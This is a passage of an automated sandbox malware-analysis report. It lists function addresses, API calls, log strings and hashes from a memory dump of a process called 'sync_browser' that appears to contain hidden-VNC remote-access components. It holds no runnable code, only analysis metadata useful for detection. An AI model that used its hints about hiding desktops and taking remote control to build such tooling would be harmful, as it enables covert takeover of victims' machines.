                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2523754900-3977938048
                                                                      • Opcode ID: b523ff4d27041372ecc1c885e73348ff295ebb74d119f44dda83730379da9b74
                                                                      • Instruction ID: 4b4802a507109d9f2910a1f8b05343532f61679d1138569ab4bb1592eafacc38
                                                                      • Opcode Fuzzy Hash: b523ff4d27041372ecc1c885e73348ff295ebb74d119f44dda83730379da9b74
                                                                      • Instruction Fuzzy Hash: BCB1C322A086C585E750AB39C4687FEA7A1FBC5F54F884136EA4C877A9CF38D445C722
                                                                      Function 00007FF7E507B8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                      • String ID: 0123456789.
                                                                      • API String ID: 478842821-2088042752
                                                                      • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                      • Instruction ID: 10b5a79f64210b98c82a5f014fad4fda7352455edfe3729664cbf6a381be1605
                                                                      • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                      • Instruction Fuzzy Hash: C941756560875985EA24BF25E420279A3A0FF88FD4F845232ED5D47798FF3CE541C721
                                                                      Function 00007FF7E50A5AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                      • String ID: ConsoleWindowClass$tty
                                                                      • API String ID: 490048385-1921057836
                                                                      • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                      • Instruction ID: 26d97b9fd90718f4b06e007d9f50316a1b2812df6fc057f32ce1eac9f9be812b
                                                                      • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                      • Instruction Fuzzy Hash: 314152367086898AEB209B25E49076DB7A1FB89F84F844036EF4E83759DF3CE545CB11
                                                                      Function 00007FF7E5098ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CursorEnterLeave$Rect
                                                                      • String ID: ^
                                                                      • API String ID: 2550375211-1590793086
                                                                      • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                      • Instruction ID: a2f0c793474108e0a7089ad6f89d7a5983814fa23a9c2044f5c6ba2f62619867
                                                                      • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                      • Instruction Fuzzy Hash: 25412A366086458BDB28DF29E5A436DB7A0F788B94F505136EB5E43B58CF38E464CF01
                                                                      Function 00007FF7E507A6B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7E507A7E7
                                                                      • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF7E507A726
                                                                      • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF7E507A738
                                                                      • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF7E507A7AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                                      • API String ID: 2777246624-2146332292
                                                                      • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                      • Instruction ID: 7fb3f6277455e54e406052debf1dd6fb425db0db44cb78b2f85f802db5569456
                                                                      • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                      • Instruction Fuzzy Hash: DE419435E0868A8AE724EF24F9507B9B361FB44B48F840137EA8D87A58DF3CE555C712
                                                                      Function 00007FF7E5089630 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileInfoLastSizeVersion
                                                                      • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                      • API String ID: 752140088-134519983
                                                                      • Opcode ID: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                                      • Instruction ID: 1ee7bb67ffa0b2598f1e360a76dd7288a6ab7401837718dd3ccebc6136c5febf
                                                                      • Opcode Fuzzy Hash: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                                      • Instruction Fuzzy Hash: DB21C565B08A4A81DA10BB66B8102A9E3A0EF85FD4F841432DE4C8765CEE7CD585C711
                                                                      Function 00007FF7E50A3523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                      • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                      • API String ID: 3622578367-539335655
                                                                      • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                      • Instruction ID: db7ba2d6cc6fc00ecb935209450e6ec01ffed6add7bd6b850dc073615f922d81
                                                                      • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                      • Instruction Fuzzy Hash: 4C214B62A085CA96F65CBB78E9643F9A391BF44B41FC84437E61EC6095DF3CA464C232
                                                                      Function 00007FF7E5129ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                      • String ID:
                                                                      • API String ID: 3646291181-0
                                                                      • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                      • Instruction ID: 28b6b029ccf8cd5ff9311654b1edecb2e1bfcd3df8490ec7cce600862f5a80f8
                                                                      • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                      • Instruction Fuzzy Hash: 2F51A726A08289C6F710AF29E460779A790EB45F94F944933EA1D877CDDF3CE4819722
                                                                      Function 00007FF7E512AD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FF7E512AD95
                                                                        • Part of subcall function 00007FF7E51377D0: _amsg_exit.LIBCMT ref: 00007FF7E51377FA
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512ADC8
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512ADE6
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE26
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE40
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE50
                                                                      • _initterm.LIBCMT ref: 00007FF7E512AE90
                                                                      • _initterm.LIBCMT ref: 00007FF7E512AEA3
                                                                      • ExitProcess.KERNEL32 ref: 00007FF7E512AEDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                      • String ID:
                                                                      • API String ID: 3873167975-0
                                                                      • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                      • Instruction ID: c9aba757f1e395e339dde808fadc594fc81a30c1ea7410022ebae0a5f183c097
                                                                      • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                      • Instruction Fuzzy Hash: 3D41AE25A0964A81E610BB11F860338E395BF88F94F940037DA4EC7B6DEF7CE455C722
                                                                      Function 00007FF7E5087AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                      • String ID:
                                                                      • API String ID: 4242051881-0
                                                                      • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                      • Instruction ID: 1e2224b2df27e7d2405805c72d13f5445e8a8243cb1fcd0dbe24ee21ae8ebe3e
                                                                      • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                      • Instruction Fuzzy Hash: A611EC25A06A0E81EF15BF71E875778A364FF44F15B841032C90E82269DF3DD845C762
                                                                      Function 00007FF7E509593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 186452611-3977938048
                                                                      • Opcode ID: cc79c19bcc8b5f7d48aa2344a5fb395df6ce65062b0848f58c75dc6cee1c68c6
                                                                      • Instruction ID: 819ade1757e0d0cdddbdd392ae9508a4db0e0efad25188664885e9365a3b5430
                                                                      • Opcode Fuzzy Hash: cc79c19bcc8b5f7d48aa2344a5fb395df6ce65062b0848f58c75dc6cee1c68c6
                                                                      • Instruction Fuzzy Hash: 09A1C522A086C585E750AB39C4687FEA7A1FBC5F54F894033EA4C877A9CF39D445C722
                                                                      Function 00007FF7E509BD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                      • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                      • API String ID: 3897446562-3886131270
                                                                      • Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                                      • Instruction ID: d610f036a3770726f6453a47ad6bbb04ad031581d649dec3280f92e077d4abb8
                                                                      • Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                                      • Instruction Fuzzy Hash: 5C819322608B8999EB10DB38D4203EDB761FB85BA4F904337EA6D43AD9DF78D505C721
                                                                      Function 00007FF7E5089260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
